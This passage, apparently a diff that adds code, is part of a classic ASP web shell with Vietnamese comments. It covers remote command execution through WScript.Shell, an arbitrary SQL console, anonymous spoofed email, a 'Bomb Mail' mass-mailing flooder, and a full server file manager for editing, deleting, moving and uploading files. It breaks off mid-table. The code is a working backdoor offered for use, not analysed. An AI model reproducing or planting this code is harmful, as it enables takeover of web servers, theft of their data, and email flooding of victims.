+<form name=frmCMD method=post action="<%=gURL%>">
+<table>
+<tr><td><b>T</b>mpDir:</td><td><input type=text name=tmpdir value="<%=Server.HtmlEncode(szTmpDir)%>" size=20></td></tr>
+<tr><td><b>S</b>hell:</td><td><input type=text name=shell value="<%=Server.HtmlEncode(szShell)%>" size=20></td></tr>
+<tr><td><b>C</b>md:</td><td><input type=text name=cmd value="<%=Server.HtmlEncode(szCmd)%>" size=80> <input type=submit value=Go></td></tr>
+<tr><td><b>E</b>cho:</td><td><input type=checkbox name=echo value=1<%if bEcho then Response.Write " checked"%>></td></tr>
+</table>
+</form>
+<script>frmCMD.cmd.focus()</script>
+<%
+if (szCmd<>"") and (bDoIt=true) then
+if bEcho then
+call oScript.Run(szShell & " /c " & szCmd)
+else
+szTmpFile = addslash(szTmpDir) & FSO.GetTempName
+call oScript.Run(szShell & " /c " & szCmd & " > " & szTmpFile, 0, true)
+if FSO.FileExists(szTmpFile) then set oFile=FSO.OpenTextFile (szTmpFile, 1, false, 0)
+end if
+end if
+%>
+<p><%=FormatDate(Now)%>
+<p><b>I</b>P: <%=Request.ServerVariables("LOCAL_ADDR")%><br>
+<b>U</b>ser: \\<%=oScriptNet.ComputerName%>\\<%=oScriptNet.UserName%>
+<%
+if (IsObject(oFile)) then
+on error resume next
+%>
+<pre>
+<%=Server.HtmlEncode(oFile.ReadAll)%>
+</pre>
+<%
+oFile.Close
+call FSO.DeleteFile(szTmpFile, true)
+end if
+
+set oScript=nothing
+set oScriptNet=nothing
+
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub mySQL()
+dim szConn,szSQL1,szSQL2,szSQL,bDoIt
+dim intChoice
+
+HtmlHeader("")
+HtmlMode()
+
+szConn=Trim(Request.Form("conn"))
+szSQL1=Trim(Request.Form("sql1"))
+szSQL2=Trim(Request.Form("sql2"))
+intChoice=CInt(Request.Form("choice"))
+
+if Session("switch")=true then
+Session("switch")=false
+bDoIt=false
+szConn=Session("szConn")
+szSQL1=Session("szSQL1")
+szSQL2=Session("szSQL2")
+intChoice=Session("intChoice")
+else
+bDoIt=true
+end if
+
+if intChoice=0 then intChoice=1
+if intChoice=1 then szSQL=szSQL1 else szSQL=szSQL2
+
+Session("szConn")=szConn
+Session("szSQL1")=szSQL1
+Session("szSQL2")=szSQL2
+Session("intChoice")=intChoice
+
+select case trim(ucase(szConn))
+case "MSSQL" 
+szConn=cstrMSSQL
+szSQL=""
+case "JET"
+szConn=cstrJET
+szSQL=""
+case "ACCESS"
+szConn=cstrACCESS
+szSQL=""
+case "ORACLE"
+szConn=cstrORACLE
+szSQL=""
+case "MYSQL"
+szConn=cstrMYSQL
+szSQL=""
+case "DSN"
+szConn=cstrDSN
+szSQL=""
+end select
+%>
+<input type=button value="<->" onclick="changeInput()">
+<form name=frmSQL method=post action="<%=gURL%>">
+<input type=hidden name=choice value="<%=intChoice%>">
+<b>C</b>onn: <input type=text name=conn value="<%=Server.HtmlEncode(szConn)%>" size=90> <br>
+<b>S</b>QL:  <span id=s1<%if intChoice=2 then Response.Write " style=""display:none"""%>><input type=text name=sql1 value="<%=Server.HtmlEncode(szSQL1)%>" size=90></span>
+<span id=s2<%if intChoice=1 then Response.Write " style=""display:none"""%>>( [F9] = Go )<br><textarea name=sql2 cols=42 rows=12 onkeydown="if (event.keyCode==120) frmSQL.submit();"><%=Server.HtmlEncode(szSQL2)%></textarea><br></span>
+<input type=submit value=Go>
+</table>
+</form>
+<script>
+frmSQL.<%if szConn="" then Response.Write "conn" else Response.Write "sql"&intChoice%>.focus();
+frmSQL.<%if szConn="" then Response.Write "conn" else Response.Write "sql"&intChoice%>.focus();
+function changeInput() {
+if (s1.style.display=='none') {
+s1.style.display='inline';
+s2.style.display='none';
+frmSQL.choice.value="1";
+frmSQL.sql1.focus();
+} else {
+s1.style.display='none';
+s2.style.display='inline';
+frmSQL.choice.value="2";
+frmSQL.sql2.focus();
+}
+}
+</script>
+<%
+if (szConn<>"") and (szSQL<>"") and (bDoIt=true) then
+dim adoCon, rS
+dim i,intAffected
+
+set adoCon=Server.CreateObject("ADODB.Connection")
+adoCon.Open szConn
+set rS=adoCon.Execute(szSQL, intAffected)
+if (rS.Fields.Count>0) then
+' hien thi ten cua cac truong
+Response.Write "<table border=1>" & vbNewLine & "<tr>"
+for i=0 to rS.Fields.Count-1
+Response.Write "<td><tt><b>"
+if (rS.Fields(i).Name="") then
+Response.Write "(No column name)"
+else
+Response.Write Server.HtmlEncode(rS.Fields(i).Name)
+end if
+Response.Write "</b></tt></td>"
+next
+Response.Write "</tr>" & vbNewLine
+' hien thi du lieu tren cac dong
+on error resume next
+rS.MoveFirst
+do while not rS.EOF
+Response.Write "<tr>"
+for i=0 to rS.Fields.Count-1
+Response.Write "<td><tt>"
+if IsNull(rs.Fields(i).Value) then
+Response.Write "NULL"
+elseif (Trim(rs.Fields(i).Value)="") then
+Response.Write " "
+else
+Response.Write Server.HtmlEncode(rS.Fields(i).Value)
+end if
+Response.Write "</tt></td>"
+next
+Response.Write "</tr>" & vbNewLine
+rS.MoveNext
+loop
+rS.Close
+Response.Write "</table>" & vbNewLine
+end if
+
+Response.Write "<p><tt>(" & intAffected & " row(s) affected)</tt>"
+
+set rS=nothing
+set adoCon=nothing
+end if
+
+HtmlFooter()
+Destroy()
+end sub
+
+
+'###########################################################################################
+
+sub myMail()
+dim strFrom,strTo,strSubject,strBody,bHtml,intNumber,i,StartTime,EndTime,bDoIt
+dim objMail,objMsg
+
+strTo=Trim(Request.Form("to"))
+
+select case Request.Form("subcommand")
+case "Send"
+strFrom=Trim(Request.Form("from"))
+strSubject=Trim(Request.Form("subject"))
+strBody=Request.Form("body")
+bHtml=CBool(Request.Form("html"))
+case "Bomb"
+if IsNumeric(Request.Form("number")) then intNumber=Int(Request.Form("number"))
+strFrom=Session("strFrom")
+strSubject=Session("strSubject")
+strBody=Session("strBody")
+bHtml=Session("bHtml")
+end select
+
+if Session("switch")=true then
+Session("switch")=false
+bDoIt=false
+strFrom=Session("strFrom")
+strTo=Session("strTo")
+strSubject=Session("strSubject")
+strBody=Session("strBody")
+bHtml=Session("bHtml")
+intNumber=Session("intNumber")
+else
+bDoIt=true
+end if
+
+if (intNumber<=0) then intNumber=gBomb
+
+Session("strFrom")=strFrom
+Session("strTo")=strTo
+Session("strSubject")=strSubject
+Session("strBody")=strBody
+Session("bHtml")=bHtml
+Session("intNumber")=intNumber
+
+HtmlHeader("")
+HtmlMode()
+
+if bDoIt then
+select case Request.Form("subcommand")
+case "Send"
+if IsValidEmail(strTo) then
+set objMail=Server.CreateObject("CDONTS.NewMail")
+objMail.To=strTo
+objMail.From=strFrom
+objMail.Subject=strSubject
+objMail.Body=strBody
+if bHtml then
+objMail.BodyFormat=0 'HTML
+objMail.MailFormat=0 'MIME
+end if
+objMail.Send
+set objMail=nothing
+Response.Write "<b>M</b>essage was sent to " & strTo & " successfully." & vbNewLine
+end if
+case "Bomb"
+if IsValidEmail(strTo) then
+Response.Write "<b>B</b>ombing " & Replace(FormatNumber(intNumber,0),",",".") & " mail"
+if intNumber>1 then Response.Write "s"
+Response.Write " to " & strTo & " ... "
+StartTime=Timer
+set objMsg=Server.CreateObject("CDO.Message")
+objMsg.To=strTo
+Randomize
+for i=1 to intNumber
+objMsg.From=makeEmail()
+objMsg.Subject=makeText(Int((50-25+1)*Rnd+25))
+objMsg.TextBody=makeText(Int((100-50+1)*Rnd+50))
+objMsg.Send
+next
+set objMsg=nothing
+EndTime=Timer
+Response.Write howlong(EndTime-StartTime) & vbNewLine
+end if
+end select
+end if
+%>
+<p>
+<table border=1>
+<tr>
+<td width=50%>
+<form name=frmSend method=post action="<%=gURL%>">
+<table>
+<tr>
+<td colspan=2>a) <b>A</b>nonymous Mail</td>
+</tr>
+<tr>
+<td><b>F</b>rom:</td>
+<td><input type=text name=from value="<%=Server.HtmlEncode(strFrom)%>" size=25></td>
+</tr>
+<tr>
+<td><b>T</b>o:</td>
+<td><input type=text name=to value="<%=Server.HtmlEncode(strTo)%>" size=25></td>
+</tr>
+<tr>
+<td><b>S</b>ubject:</td>
+<td><input type=text name=subject value="<%=Server.HtmlEncode(strSubject)%>" size=50></td>
+</tr>
+<tr>
+<td valign=top><b>B</b>ody:</td>
+<td><textarea name=body cols=37 rows=12><%=Server.HtmlEncode(strBody)%></textarea></td>
+</tr>
+<tr>
+<td><b>H</b>tml:</td>
+<td><input type=checkbox name=html value=1<%if bHtml=true then Response.Write " checked"%>></td>
+</tr>
+<tr>
+<td colspan=2><input type=submit name=subcommand value=Send></td>
+</tr>
+</table>
+</form>
+</td>
+<td width=50% valign=top>
+<form name=frmBomb method=post action="<%=gURL%>">
+<table>
+<tr>
+<td colspan=2>b) <b>B</b>omb Mail</td>
+</tr>
+<tr>
+<td><b>A</b>ddress:</td>
+<td><input type=text name=to value="<%=Server.HtmlEncode(strTo)%>" size=25></td>
+</tr>
+<tr>
+<td><b>N</b>umber:</td>
+<td><input type=text name=number value=<%=intNumber%>></td>
+</tr>
+<tr>
+<td colspan=2><input type=submit name=subcommand value=Bomb></td>
+</tr>
+</table>
+</form>
+</td>
+</tr>
+</table>
+<%
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+function IsValidEmail(strEAddress)
+dim objRegExpr
+set objRegExpr = New RegExp
+objRegExpr.Pattern = "^[a-zA-Z0-9][\w\.-]*[a-zA-Z0-9]@[\w-\.]*[a-zA-Z0-9]\.[a-zA-Z]{2,7}$"
+objRegExpr.Global = true
+objRegExpr.IgnoreCase = False
+IsValidEmail = objRegExpr.Test(strEAddress)
+set objRegExpr = nothing
+end function
+
+'###########################################################################################
+
+function makeEmail()
+Randomize
+if Int((1-0+1)*Rnd+0)=0 then makeEmail=makeText(8) & "@" & makeText(8) & "." & zombie_array(Int((UBound(zombie_array)-0+1)*Rnd+0)) else makeEmail=makeText(8) & "@" & special_array(Int((UBound(special_array)-0+1)*Rnd+0))
+end function
+
+'###########################################################################################
+
+function makeText(intLen)
+dim strNewText,i
+strNewText=""
+Randomize
+for i=1 to intLen
+strNewText=strNewText & Mid(charset,Int((Len(charset)-1+1)*Rnd+1),1)
+next
+makeText=strNewText
+end function
+
+'###########################################################################################
+
+function howlong(intTime)
+if (intTime<60) then
+howlong=intTime & " second(s)"
+elseif (intTime<60*60) then
+howlong=FormatNumber(intTime/60,2) & " minute(s)"
+else
+howlong=FormatNumber(intTime/(60*60),2) & " hour(s)"
+end if
+end function
+
+'###########################################################################################
+
+sub Tree()
+dim path
+path=abspath(Request.Form("param"))
+if FSO.FolderExists(path) then
+%>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
+<title><%=path%></title>
+<style>
+body,td{font-family:Fixedsys}
+a{color:#0000ff}
+</style>
+</head>
+<body bgcolor=#000000 text=#ffffff>
+<%
+tree_dir(path)
+%>
+</body>
+</html>
+<%
+else
+%>
+<script>alert('Folder not found !');window.close();</script>
+<%
+end if
+Destroy()
+end sub
+
+sub tree_dir(path)
+dim strAttrib,strSize
+
+on error resume next
+
+dim oFolder
+dim oSubFolders,oSubFolder
+dim oFiles,oFile
+dim oSubFolders2,oSubFolder2
+dim oFiles2,oFile2
+
+set oFolder=FSO.GetFolder(path)
+set oSubFolders=oFolder.SubFolders
+set oFiles=oFolder.Files
+
+Response.Write "<p>" & FSO.GetAbsolutePathName(path)
+
+strAttrib=GetAttributes(oFolder.Attributes)
+
+if strAttrib<>" " then Response.Write " (" & GetAttributes(oFolder.Attributes) & ")"
+
+Response.Write vbNewLine
+
+if (oSubFolders.Count>0) or (oFiles.Count>0) then
+%>
+<table border=0 cellspacing=1 cellpadding=2 bgcolor=#ff0000>
+<tr bgcolor=#000000>
+<td><font color=#FFFF00>Name</font></td>
+<td align=center><font color=#FFFF00>Size</font></td>
+<td align=center><font color=#FFFF00>Type</font></td>
+<td align=center><font color=#FFFF00>Modified</font></td>
+<td align=center><font color=#FFFF00>Attributes</font></td>
+</tr>
+<%
+' liet ke thu muc
+for each oSubFolder in oSubFolders
+%>
+<tr bgcolor=#000000>
+<td><%=oSubFolder.Name%></td>
+<td align=right> </td>
+<td align=center>DIR</td>
+<td align=center><%=FormatDate(oSubFolder.DateLastModified)%></td>
+<td><%=GetAttributes(oSubFolder.Attributes)%></td>
+</tr>
+<%
+next
+
+' liet ke file
+for each oFile in oFiles
+%>
+<tr bgcolor=#000000>
+<td<%if (FSO.GetExtensionName(path & "\" & oFile.Name)="lnk") or (FSO.GetExtensionName(path & "\" & oFile.Name)="url") then Response.Write " title=""" & FindLink(path & "\" & oFile.Name) & """"%>><%=oFile.Name%></td>
+<td align=right><%=FormatSize(oFile.Size)%></td>
+<td align=center><%=oFile.Type%></td>
+<td align=center><%=FormatDate(oFile.DateLastModified)%></td>
+<td><%=GetAttributes(oFile.Attributes)%></td>
+</tr>
+<%
+next
+strSize=FormatSize(oFolder.Size)
+%>
+<tr bgcolor=#000000>
+<td colspan=5 align=center><%=oSubFolders.Count%> folder(s), <%=oFiles.Count%> file(s)<%if strSize<>"" then Response.Write " (" & strSize & ")"%></td>
+</tr>
+</table>
+<%
+' goi de qui
+for each oSubFolder in oSubFolders
+set oSubFolder2=oSubFolder.SubFolders
+set oFile2=oSubFolder.Files
+
+if (oSubFolder2.Count>0) or (oFile2.Count>0) then
+tree_dir(oSubFolder.ParentFolder & "\" & oSubFolder.Name)
+end if
+
+set oSubFolder2=nothing
+set oFile2=nothing
+next
+end if
+
+set oSubFolder=nothing
+set oFiles=nothing
+set oFolder=nothing
+end sub
+
+'###########################################################################################
+
+sub Editor()
+dim f,name,path
+
+on error resume next
+
+HtmlHeader("")
+
+name=Request.Form("param")
+path=addslash(targetPath) & name
+
+select case Request.Form("subcommand")
+case "Save","SaveAs"
+set f=FSO.OpenTextFile(path,2,true,-2)
+if Err.Number<>0 then
+gMsg="Can not write to the file """ & name & """, permission denied!"
+Err.Clear
+else
+f.Write Request.Form("content")
+end if
+set f=nothing
+set f=FSO.OpenTextFile(path,1,false,-2)
+case else
+if not FSO.FileExists(path) then
+gMsg="The file """ & name & """ does not exist"
+set f=FSO.CreateTextFile(path,false)
+if Err.Number<>0 then
+gMsg=gMsg & ", also unable to create new file."
+Err.Clear
+else
+gMsg=gMsg & ", created new file."
+end if
+else
+set f=FSO.OpenTextFile(path,1,false,-2)
+if Err.Number<>0 then
+gMsg="Can not read from the file """ & name & """, permission denied!"
+Err.Clear
+end if
+end if
+end select
+%>
+<% if gMsg<>"" then Response.Write "<script>alert('" & gMsg & "')</script>" & vbNewLine %>
+<p><b>E</b>diting - "<%=path%>"<br>
+<form name=frmFile method=post action="<%=gURL%>">
+<b>W</b>rap<input type=checkbox id=wrap onclick="EditorCommand('WordWrap')">
+<center>
+<table width=100%>
+<tr><td align=center>
+<textarea name=content rows=25 cols=46 style="width:580;height:330" wrap=off><%=Server.HTMLEncode(f.ReadAll)%></textarea>
+</td></tr>
+<tr><td align=center>
+<input type=button value=Save onclick="EditorCommand('Save')"> <input type=button value="Save As" onclick="EditorCommand('SaveAs')"> <input type=button value=Reload onclick="EditorCommand('Reload')"> <input type=button value=Close onclick="window.close()">
+</td></tr>
+</table>
+</center>
+<script>frmFile.content.focus()</script>
+<input type=hidden name=command value=Edit>
+<input type=hidden name=subcommand value="">
+<input type=hidden name=param value="<%=name%>">
+<input type=hidden name=folder value="<%=Request.Form("folder")%>">
+</form>
+<%
+set f=nothing
+HtmlJsEditor()
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub ChangeAttributesItem()
+dim item,itemType,itemName,itemPath,itemAttrib
+
+itemType=Request.Form("command")
+itemName=Request.Form("param")
+itemPath=addslash(targetPath) & itemName
+
+HtmlHeader("")
+
+select case itemType
+case "ChangeAttributesFile" set item=FSO.GetFile(itemPath)
+case "ChangeAttributesFolder" set item=FSO.GetFolder(itemPath)
+end select
+
+if Request.Form("subcommand")="change" then
+itemAttrib=int(Request.Form("r"))
+itemAttrib=itemAttrib+int(Request.Form("h"))
+itemAttrib=itemAttrib+int(Request.Form("a"))
+itemAttrib=itemAttrib+int(Request.Form("s"))
+on error resume next
+item.Attributes=int(itemAttrib)
+if Err.Number<>0 then Response.Write "<script>alert('Permission denined')</script>" & vbNewLine
+end if
+
+itemAttrib=item.Attributes
+%>
+<b>C</b>hange attributes - "<%=itemName%>"
+<p align=center>
+<form name=frmAttrib method=post action="<%=gURL%>">
+<input type=hidden name=command value="<%=itemType%>">
+<input type=hidden name=subcommand value=change>
+<input type=hidden name=folder value="<%=targetPath%>">
+<input type=hidden name=param value="<%=itemName%>">
+<table>
+<tr>
+<td><input type=checkbox name=r value=1 <%if (itemAttrib and 1)>0 then Response.Write " checked"%>>Read-only</td>
+<td><input type=checkbox name=h value=2 <%if (itemAttrib and 2)>0 then Response.Write " checked"%>>Hidden</td>
+</tr>
+<tr>
+<td><input type=checkbox name=a value=32 <%if (itemAttrib and 32)>0 then Response.Write " checked"%>>Archive</td>
+<td><input type=checkbox name=s value=4 <%if (itemAttrib and 4)>0 then Response.Write " checked"%>>System</td>
+</tr>
+</table><br>
+<input type=button value=OK onclick="frmAttrib.submit()"> <input type=button value=Close onclick="window.close()">
+</form>
+</p>
+<%
+set itemType=nothing
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub OpenFolder()
+if Trim(Request.Form("folder"))="" then 
+if Trim(Request.Form("param"))="" then targetPath=root else targetPath=abspath(Trim(Request.Form("param")))
+else
+targetPath=addslash(Trim(Request.Form("folder"))) & Trim(Request.Form("param"))
+end if
+end sub
+
+'###########################################################################################
+
+sub CreateItem()
+dim itemType,itemName,itemPath 
+itemType=request.form("command")
+itemName=request.form("param")
+itemPath=addslash(targetPath) & itemName
+
+on error resume next
+
+select case itemType
+case "NewFolder"
+if (FSO.FolderExists(itemPath)=false) and (FSO.FileExists(itemPath)=false) then
+FSO.CreateFolder(itemPath)
+if Err.Number<>0 then
+gMsg="Unable to create the folder """ & itemName & """, an error occured..."
+else
+gMsg="Created the folder """ & itemName & """..."
+end if
+else
+gMsg="Unable to create the folder """ & itemName & """, there exists a file or a folder with the same name..."
+end if
+case "NewFile"
+if (FSO.FolderExists(itemPath)=false) and (FSO.FileExists(itemPath)=false) then
+FSO.CreateTextFile(itemPath)
+if Err.Number<>0 then
+gMsg="Unable to create the file """ & itemName & """, an error occured..."
+else
+gMsg="Created the file """ & itemName & """..."
+end if
+else
+gMsg="Unable to create the file """ & itemName & """, there exists a file or a folder with the same name..."
+end if
+end select
+end sub
+
+'###########################################################################################
+
+sub ZipInfo()
+dim path,zip,zipfile,i
+
+path=addslash(targetPath) & Request.Form("param")
+%>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
+<title><%=path%></title>
+<style>
+body,td{font-family:Fixedsys}
+a{color:#0000ff}
+</style>
+</head>
+<body bgcolor=#000000 text=#ffffff>
+<p><%=path%>
+<table border=0 cellspacing=1 cellpadding=2 bgcolor=#ff0000>
+<tr bgcolor=#000000>
+<td><font color=#FFFF00>Name</font></td>
+<td align=center><font color=#FFFF00>Size</font></td>
+<td align=center><font color=#FFFF00>Ratio</font></td>
+<td align=center><font color=#FFFF00>Packed</font></td>
+<td align=center><font color=#FFFF00>Modify</font></td>
+<td align=center><font color=#FFFF00>Path</font></td>
+</tr>
+<%
+set zip=new clszip
+zip.ZipLoad(path)
+set zipfile=new clsZipFile
+
+for i=1 to zip.FileCount
+set zipfile=zip.GetFile(i)
+with zipfile
+if not (.IsFolder Or .IsOverall) then
+Response.Write "<tr bgcolor=#000000>" & vbNewLine
+Response.Write " <td>" & .Name & "</td>" & vbNewLine
+Response.Write " <td align=right>" & FormatNumber(.Size,0) & "</td>" & vbNewLine
+Response.Write " <td align=right>" & .Ratio & "</td>" & vbNewLine
+Response.Write " <td align=right>" & FormatNumber(.Packed,0) & "</td>" & vbNewLine
+Response.Write " <td align=center>" & FormatDate(.Modified) & "</td>" & vbNewLine
+Response.Write " <td>" & .Path & "</td>" & vbNewLine
+end if
+end with
+next
+
+set ZipFile=nothing
+set zip=nothing
+%>
+</table>
+</p>
+<%
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub Delete()
+dim i,ndir,nfile,itemName,itemPath
+
+on error resume next
+
+ndir=Request.Form("d").Count
+nfile=Request.Form("f").Count
+
+if (ndir>0) then
+gMsg="<b>D</b>elete folder(s)..."
+for i=1 to ndir
+itemName=Request.Form("d")(i)
+itemPath=addslash(targetPath) & itemName
+FSO.DeleteFolder itemPath,true
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+if Err.Number<>0 then
+gMsg=gMsg & "error"
+else
+gMsg=gMsg & "success"
+end if
+next
+end if
+
+if (nfile>0) then
+if (ndir>0) then gMsg= gMsg & "<p>" & vbNewLine
+gMsg=gMsg & "<b>D</b>elete file(s)..."
+for i=1 to nfile
+itemName=Request.Form("f")(i)
+itemPath=addslash(targetPath) & itemName
+FSO.DeleteFile itemPath,true
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+if Err.Number<>0 then
+gMsg=gMsg & "error"
+else
+gMsg=gMsg & "success"
+end if
+next
+end if
+
+end sub
+
+'###########################################################################################
+
+sub Copy()
+dim i,nfile,ndir,itemName,itemPath
+
+on error resume next
+
+cp_dst=Trim(Request.Form("cp"))
+if cp_dst="" then exit sub
+cp_dst=abspath(cp_dst)
+Session("cp_dst")=cp_dst
+
+if FSO.FolderExists(cp_dst)=false then
+gMsg="<p>Folder not exists" & vbNewLine
+exit sub
+end if
+
+ndir=Request.Form("d").Count
+nfile=Request.Form("f").Count
+
+if (ndir>0) then
+gMsg="<b>C</b>opying folder(s) to """ & cp_dst & """ ..."
+for i=1 to ndir
+itemName=Request.Form("d")(i)
+itemPath=addslash(targetPath) & itemName
+FSO.CopyFolder itemPath,addslash(cp_dst),true
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+if Err.Number<>0 then
+gMsg=gMsg & "error"
+else
+gMsg=gMsg & "success"
+end if
+next
+end if
+
+if (nfile>0) then
+if (ndir>0) then gMsg= gMsg & "<p>" & vbNewLine
+gMsg=gMsg & "<b>C</b>opying file(s) to """ & cp_dst & """ ..."
+for i=1 to nfile
+itemName=Request.Form("f")(i)
+itemPath=addslash(targetPath) & itemName
+FSO.CopyFile itemPath,addslash(cp_dst),true
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+if Err.Number<>0 then gMsg=gMsg & "error" else gMsg=gMsg & "success"
+next
+end if
+
+end sub
+
+'###########################################################################################
+
+sub Move()
+dim i,nfile,ndir,itemName,itemPath
+
+on error resume next
+
+mv_dst=Trim(Request.Form("mv"))
+if mv_dst="" then exit sub
+mv_dst=abspath(mv_dst)
+Session("mv_dst")=mv_dst
+
+if FSO.FolderExists(mv_dst)=false then
+gMsg="<p>Folder not exists" & vbNewLine
+exit sub
+end if
+
+ndir=Request.Form("d").Count
+nfile=Request.Form("f").Count
+
+if (ndir>0) then
+gMsg="<b>M</b>oving folder(s) to """ & mv_dst & """ ..."
+for i=1 to ndir
+itemName=Request.Form("d")(i)
+itemPath=addslash(targetPath) & itemName
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+FSO.MoveFolder itemPath,addslash(mv_dst)
+if Err.Number<>0 then gMsg=gMsg & "error" else gMsg=gMsg & "success"
+set item=nothing
+next
+end if
+
+if (nfile>0) then
+if (ndir>0) then gMsg= gMsg & "<p>" & vbNewLine
+gMsg=gMsg & "<b>M</b>oving file(s) to """ & mv_dst & """ ..."
+for i=1 to nfile
+itemName=Request.Form("f")(i)
+itemPath=addslash(targetPath) & itemName
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+FSO.MoveFile itemPath,addslash(mv_dst)
+if Err.Number<>0 then gMsg=gMsg & "error" else gMsg=gMsg & "success"
+next
+end if
+end sub
+
+'###########################################################################################
+
+sub RenameItem()
+dim item,itemType,itemName,itemPath
+dim param,newName
+
+itemType=request.form("command")
+param=split(request.form("param"),"|")
+itemName=param(0)
+newName=param(1)
+itemPath=addslash(targetPath) & newName
+
+on error resume next
+
+select case itemType
+case "RenameFolder"
+if (FSO.FolderExists(itemPath)=false) and (FSO.FileExists(itemPath)=false) then
+itemPath=addslash(targetPath) & itemName
+set item=FSO.GetFolder(itemPath)
+item.Name=newName
+if Err.Number<>0 then
+gMsg="Unable to rename the folder """ & itemName & """, an error occured..."
+else
+gMsg="Renamed the folder """ & itemName & """ to """ & newName & """..."
+end if
+else
+gMsg="Unable to rename the folder """ & itemName & """, there exists a file or a folder with the new name """ & newName & """..."
+end if
+case "RenameFile"
+if (FSO.FolderExists(itemPath)=false) and (FSO.FileExists(itemPath)=false) then
+itemPath=addslash(targetPath) & itemName
+set item=FSO.GetFile(itemPath)
+item.Name=newName
+if Err.Number<>0 then
+gMsg="Unable to rename the file """ & itemName & """, an error occured..."
+else
+gMsg="Renamed the file """ & itemName & """ to """ & newName & """..."
+end if
+else
+gMsg="Unable to rename the file """ & itemName & """, there exists a file or a folder with the new name """ & newName & """..."
+end if
+end select
+
+set item=nothing
+end sub
+
+'###########################################################################################
+
+sub List()
+dim objFolder,folder,item,intCount,bOpen,ext,count
+if not FSO.FolderExists(targetPath) then
+gMsg="Folder not found"
+else
+on error resume next
+set objFolder=FSO.GetFolder(targetPath)
+if Err.Number<>0 then
+gMsg="Can't open folder"
+else
+intCount=objFolder.SubFolders.Count+objFolder.Files.Count
+if Err.Number<>0 then
+gMsg="Permission denied"
+else
+%>
+<input type=button value=Refresh onclick="Command('Refresh')">
+<input type=button value="New File" onclick="Command('NewFile')">
+<input type=button value="New Folder" onclick="Command('NewFolder')">
+<input type=button value=Upload onclick="frmUpload.max.focus()">
+<input type=button value=Tree onclick="Command('Tree')">
+<%
+bOpen=true
+end if
+end if
+end if
+HtmlQuick()
+if gMsg<>"" then Response.Write "<p>" & gMsg & vbNewLine
+if bOpen then
+count=0
+if intCount>0 then Response.Write "<p>" & objFolder.SubFolders.Count & " subfolder(s)<br>" & vbNewLine & objFolder.Files.Count & " file(s)<br>" & vbNewLine
+if bSize then Response.Write "(" & FormatSize(objFolder.Size) & ")<br>" & vbNewLine
+%>
+<p>
+<table border=1 width=100%>
+<tr>
+<td><b>N</b>ame</td>
+<td align=center><b>S</b>ize</td>
+<td align=center><b>T</b>ype</td>
+<td align=center><b>M</b>odified</td>
+<td><b>A</b>ttributes</td>
+<td><b>A</b>ctions</td>
+<tr>
+<%
+if not isroot(targetPath) then
+%>
+<tr>
+<td><a href="javascript:Command('LevelRoot')" title="Up Root Level">\</a></td>
+<td> </td>
+<td align=center>Root</td>
+<td> </td>
+<td> </td>
+<td> </td>
+</tr>
+<tr>
+<td><a href="javascript:Command('LevelUp')" title="Up One level">..</a></td>
+<td> </td>
+<td align=center>Up</td>
+<td> </td>
+<td> </td>
+<td> </td>
+</tr>
+<%
+end if
+if intCount>0 then
+HtmlJsForm()
+%>
+<form name=theForm method=post action="<%=gURL%>">
+<input type=hidden name=command value="">
+<input type=hidden name=folder value="<%=targetPath%>">
+<%
+for each item in objFolder.SubFolders
+count=count+1
+Response.Write "<tr>" & vbNewLine
+Response.Write " <td><a href=""javascript:Command('OpenFolder',"" & item.Name & "")""" 
+if Len(item.Name)>gMax then Response.Write " title=""" & item.Name & """"
+Response.Write ">" & FormatName(item.Name) & "</a></td>" & vbNewLine
+Response.Write " <td align=right> </td>" & vbNewLine
+Response.Write " <td align=center>DIR</td>" & vbNewLine
+Response.Write " <td align=center>" & FormatDate(item.DateLastModified ) & "</td>" & vbNewLine
+Response.Write " <td>" & GetAttributes(item.Attributes) & "</td>" & vbNewLine
+Response.Write " <td><input type=checkbox name=d value=""" & item.Name & """><input type=button value=Ren onclick=""Command('RenameFolder',"" & item.Name & "")""><input type=button value=Attr onclick=""Command('ChangeAttributesFolder',"" & item.Name & "")""></td>" & vbNewLine
+Response.Write "</tr>" & vbNewLine
+next
+for each item in objFolder.Files
+count=count+1
+Response.Write "<tr>" & vbNewLine
+Response.Write " <td><a href=""javascript:Command('Download',"" & item.Name & "")"""
+ext=FSO.GetExtensionName(addslash(targetPath) & item.Name)
+re.IgnoreCase = true
+re.Pattern = "^" & ext & ",|," & ext & ",|," & ext & "$"
+if re.Test(lnkExt) then
+Response.Write " title=""-> " & Server.Htmlencode(FindLink(addslash(targetPath) & item.Name)) & """"
+elseif Len(item.Name)>gMax then
+Response.Write " title=""" & item.Name & """"
+end if
+
+Response.Write ">" & FormatName(item.Name) & "</td>" & vbNewLine
+Response.Write " <td align=right>" & FormatSize(item.Size) & "</td>" & vbNewLine
+Response.Write " <td align=center>" & item.Type & "</td>" & vbNewLine
+Response.Write " <td align=center>" & FormatDate(item.DateLastModified ) & "</td>" & vbNewLine
+Response.Write " <td>" & GetAttributes(item.Attributes) & "</td>" & vbNewLine
+Response.Write " <td><input type=checkbox name=f value=""" & item.Name & """><input type=button value=Ren onclick=""Command('RenameFile',"" & item.Name & "")""><input type=button value=Attr onclick=""Command('ChangeAttributesFile',"" & item.Name & "")"">"
+
+if re.Test(editExt) then
+Response.Write "<input type=button value=Edit onclick=""Command('Edit',"" & item.Name & "")"">"
+end if
+
+if Lcase(ext)="zip" then
+Response.Write "<input type=button value=Info onclick=""Command('ZipInfo',"" & item.Name & "")"">"
+end if
+
+Response.Write "</td>" & vbNewLine
+Response.Write "</tr>" & vbNewLine
+next
+if count>0 then
+%>
+<tr>
+<td> </td>
+<td> </td>
+<td> </td>
+<td> </td>
+<td> </td>
